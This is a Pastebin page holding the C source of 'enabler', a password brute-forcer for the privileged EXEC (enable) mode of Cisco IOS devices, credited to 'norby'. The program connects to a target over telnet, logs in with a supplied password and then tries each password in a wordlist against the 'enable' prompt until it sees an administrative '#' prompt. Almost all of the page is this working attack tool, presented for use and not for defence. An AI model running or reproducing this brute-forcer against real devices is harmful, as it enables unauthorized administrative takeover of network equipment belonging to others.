API tools faq
paste
Guest User

Untitled

a guest
Sep 23rd, 2018
164
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.32 KB | None | 0 0
raw download clone embed print report
  1. /*
  2. enabler.
  3. Cisco IOS privileged EXEC bruteforcer
  4.  
  5. Year: 2001
  6. Included in Linux Backtrack v2
  7.  
  8. */
  9.  
  10.  
  11.  
  12. #include <stdio.h>
  13. #include <stdlib.h>
  14. #include <errno.h>
  15. #include <sys/socket.h>
  16. #include <netinet/in.h>
  17. #include <netdb.h>
  18. #include <signal.h>
  19. #include <string.h>
  20.  
  21. #define BOX "\033[0m\033[34;1m[\033[0m\033[37;1m`\033[0m\033[34;1m]"
  22.  
  23. struct sockaddr_in addr;
  24. char host[100];
  25. struct hostent *hp;
  26. int sock_stat;
  27.  
  28. int n,x;
  29. char **password;
  30.  
  31. char resolve(char *inputhost) {
  32.  
  33. int a,b,c,d;
  34.  
  35. if (sscanf(inputhost,"%d.%d.%d.%d",&a,&b,&c,&d) !=4) {
  36. hp = gethostbyname(inputhost);
  37. if (hp == NULL) { printf("%s error on host resolving\n\033[0m\n", BOX); exit(0); }
  38. sprintf(host,"%d.%d.%d.%d",(unsigned char)hp->h_addr_list[0][0],
  39. (unsigned char)hp->h_addr_list[0][1],
  40. (unsigned char)hp->h_addr_list[0][2],
  41. (unsigned char)hp->h_addr_list[0][3]);
  42. }
  43. else { strncpy(host,inputhost,100); }
  44. }
  45.  
  46. int sock(char *hostoresolve,int port) {
  47.  
  48. int err;
  49.  
  50. sock_stat = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
  51. if(sock_stat<0) { printf("%s error opening socket\n\033[0m\n", BOX); exit(0); }
  52.  
  53. addr.sin_family = PF_INET;
  54. addr.sin_port = htons(port);
  55. addr.sin_addr.s_addr = inet_addr(host);
  56.  
  57. err = connect(sock_stat, (struct sockaddr *) &addr, sizeof(addr));
  58. if (err < 0) { printf("%s error opening connection\n\033[0m\n", BOX); exit(0); }
  59. }
  60.  
  61. int banner() {
  62. printf("\n%s enabler.\n", BOX);
  63. printf("%s cisco internal bruteforcer. concept by anyone\n", BOX);
  64. printf("%s coded by norby\n", BOX);
  65. }
  66. int usage(char *argv) { printf("%s usage: %s <ip> [-u user] <pass> <passlist> [port]\n\n\033[0m", BOX, argv); }
  67.  
  68. void sig() {
  69. if(n>0) { printf("%s %i passwords tryed. no password matching. leaving\n",BOX,n); }
  70. printf("\n\033[0m"); exit(0);
  71. }
  72.  
  73. int login(char *login, char *pass) {
  74.  
  75. char *input = malloc(4000);
  76. int reqlogin;
  77.  
  78. while (read (sock_stat, input, 4000) > 0) {
  79. if(strstr(input,"ogin:")||strstr(input,"sername:")) {
  80. if(!strcmp(login,"n0login")) {
  81. printf("%s username needed... give me a username next time :)\n\n\033[0m", BOX);
  82. exit(0);
  83. }
  84. printf("%s login requested. sending [%s] and [%s]\n", BOX, login, pass); reqlogin=1; break;
  85. }
  86. if(strstr(input,"assword:")) { printf("%s only password needed. sending [%s]\n", BOX, pass); reqlogin=0; break; }
  87. bzero(input,4000);
  88. }
  89.  
  90. if(reqlogin==1) {
  91. write(sock_stat,login,strlen(login));
  92. write(sock_stat,"\r\n",2);
  93.  
  94. while(read(sock_stat,input,4000)>0) {
  95. if(strstr(input,"assword")); { break; }
  96. }
  97. }
  98.  
  99. write(sock_stat,pass,strlen(pass));
  100. write(sock_stat,"\r\n",2);
  101.  
  102. sleep(2);
  103.  
  104. bzero(input,4000);
  105.  
  106. while (read (sock_stat, input, 4000) > 0) {
  107. if(strstr(input,">")) { printf("%s seems we are logged in :)\n", BOX); break; }
  108. /* if(strstr(input,"assword:")) {
  109. printf("%s sorry... [%s] is not a good password for login :�\n\033[0m\n",BOX,pass); exit(0);
  110. }*/
  111. if(strstr(input,"sername:")) {
  112. printf("%s sorry... [%s] is not a good password for login :�\n\033[0m\n",BOX,pass); exit(0);
  113. }
  114. bzero(input,4000);
  115. }
  116. }
  117.  
  118. int loadwordlist(char *list) {
  119.  
  120. FILE *passlist;
  121. char buf[32], fake;
  122. int i,z;
  123.  
  124. if ((passlist = fopen(list, "r")) == NULL) {
  125. printf("%s sorry, unable to open the passlist [%s]\n\033[0m\n", BOX,list);
  126. exit(0);
  127. }
  128.  
  129. (void)fseek(passlist, 0L, SEEK_END); // cazz questo e' uno smanettamento mentale
  130. password = malloc(ftell(passlist)); // per fare allocare solo la memoria giusta x la passlist :P
  131. if(password == NULL) {
  132. printf("%s sorry, can't allocate memory for passlist. buy more ram or cut the passlist\n\033[0m\n",BOX);
  133. exit(0);
  134. }
  135.  
  136. (void)fseek(passlist, 0L, SEEK_SET);
  137.  
  138. while (!feof(passlist)) {
  139. fgets(buf, 32, passlist);
  140. if (buf[0] == '#' || buf[0] == '\n') continue;
  141. for (i = 0; i < strlen(buf); i++)
  142. if (buf[i] == '\n'||buf[i] == '\r') buf[i] = '\0';
  143. password[x] = malloc(32);
  144. strcpy(password[x], buf);
  145. memset(buf, 0, 32);
  146. x++;
  147. }
  148. password[x] = 0x0;
  149. fclose(passlist);
  150. if(x<4) { printf("%s sorry, but passlist must contain at least 3 passwords. leaving \n\033[0m\n",BOX); exit(0); }
  151.  
  152. }
  153.  
  154. int brute() { // there is a stupid error... the last password is tryed 2 times... must be fixed... ;)
  155.  
  156. char *input = malloc(100);
  157. int N;
  158.  
  159. bzero(input,100);
  160.  
  161. write(sock_stat,"enable",6);
  162. write(sock_stat,"\r\n",2);
  163.  
  164.  
  165. while(1) {
  166.  
  167. while(read(sock_stat,input,100)>0) {
  168. if(n==x) { printf("%s %i passwords tried. no valid password found in the passlist\n\033[0m\n",BOX,n-1); exit(0); }
  169. if(n+1==x) break;
  170. if(strstr(input,"assword:")||strstr(input,"#")||strstr(input,">")) break;
  171. bzero(input,100);
  172. }
  173.  
  174. if(strstr(input,"#")) { printf("%s possible password found: %s\n\033[0m\n",BOX,password[n-1]); exit(0); }
  175.  
  176. if(strstr(input,"assword:")) {
  177. write(sock_stat,password[n],strlen(password[n]));
  178. write(sock_stat,"\r\n",2);
  179. n++;
  180. bzero(input,100);
  181. if(n>1) printf("%s %s... wrong password\n", BOX, password[n-2]); fflush(stdout);
  182. continue;
  183. }
  184. if(strstr(input,">")) {
  185. write(sock_stat,"enable\r\n",8); bzero(input,100);
  186. }
  187. }
  188. }
  189.  
  190. int main(int argc, char *argv[]) {
  191.  
  192. int port;
  193.  
  194. signal(SIGINT, sig);
  195.  
  196. banner();
  197. if((argc<=3)||(argc>=8)) { usage(argv[0]); exit(0); }
  198.  
  199. if(!strcmp(argv[2],"-u")) {
  200. if(argc==6) { port=atoi("23"); }
  201. else { port=atoi(argv[6]); } // c'e' uno stupido errore qua di argc che nn ho voglia di trovare
  202. // c'ho cosetta nella testa :� -- Corretto :)
  203.  
  204. printf("%s\n",BOX);
  205.  
  206. loadwordlist(argv[5]);
  207. resolve(argv[1]);
  208. sock(host, port);
  209. login(argv[3],argv[4]);
  210. brute();
  211. }
  212.  
  213. else {
  214. if(argc==4) { port=atoi("23"); }
  215. else { port=atoi(argv[4]); }
  216. printf("%s\n",BOX);
  217.  
  218. loadwordlist(argv[3]);
  219. resolve(argv[1]);
  220. sock(host, port);
  221. login("n0login",argv[2]);
  222. brute();
  223. }
  224. }
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!